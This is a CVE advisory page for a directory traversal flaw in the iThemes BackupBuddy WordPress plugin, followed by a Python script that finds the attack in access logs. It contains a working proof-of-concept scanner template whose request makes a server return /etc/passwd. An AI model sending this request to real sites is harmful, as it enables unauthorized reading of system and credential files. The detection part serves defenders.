CVE-2022-31474: CVE-2022-31474

Date: 2025-08-01 | Affected software: CVE-2022-31474 | PoC: public

Vulnerability description

Directory traversal vulnerability in the iThemes BackupBuddy plugin, versions 8.5.8.0 through 8.7.4.1.

PoC code [public]

id: CVE-2022-31474

info:
  name: CVE-2022-31474
  author: zhizhuo
  severity: high
  verified: true
  description: |-
    iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31474
  tags: cve,cve2022,ithemes,backupbuddy,directorytraversal,traversal,rce
  created: 2023/06/23

rules:
  verify:
    request:
      method: GET
      path: /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd
    expression: response.status == 200 && response.body.bcontains(b'/bin/bash') && response.body.bcontains(b'root')
expression: verify()
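For the defending side, the request shape in the template above (admin-post.php, page=pb_backupbuddy_destinations, a local-download value pointing outside the backup directory) is easy to pick out of web-server access logs. The following is an added detection example, not part of the original page or the PoC template; the log lines are constructed, and the field names in the findings are my own choice.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not taken from
# the original page. Lines 1 and 2 mimic the PoC request shape; line 3 is a
# legitimate download of a backup archive; line 4 is unrelated traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd HTTP/1.1" 200 1832
203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1832
198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=backup-2025-08-01.zip HTTP/1.1" 200 52911
198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 4021
"""

# Pulls method, request target and status code out of the quoted request.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def is_traversal_value(value: str) -> bool:
    """True if a local-download value escapes the backup directory: an absolute
    path, a parent-directory segment, or a NUL byte. Decodes twice so that
    double-percent-encoded variants are caught as well."""
    v = unquote(unquote(value)).replace("\\", "/")
    return v.startswith("/") or "../" in v or v == ".." or "\0" in v

def flag_backupbuddy_traversal(log_text: str) -> list[dict]:
    """Return one finding per request that reaches the BackupBuddy destinations
    page with a traversal-shaped local-download parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/wp-admin/admin-post.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("page") != ["pb_backupbuddy_destinations"]:
            continue
        for value in qs.get("local-download", []):
            if is_traversal_value(value):
                findings.append({
                    "client": line.split(" ", 1)[0],
                    "status": int(m.group("status")),
                    "local_download": value,
                })
    return findings
```

A 200 status on a flagged line means the server handed the file back, so it is worth triaging before the non-200 ones; requests after the 8.7.4.1 fix should fail instead.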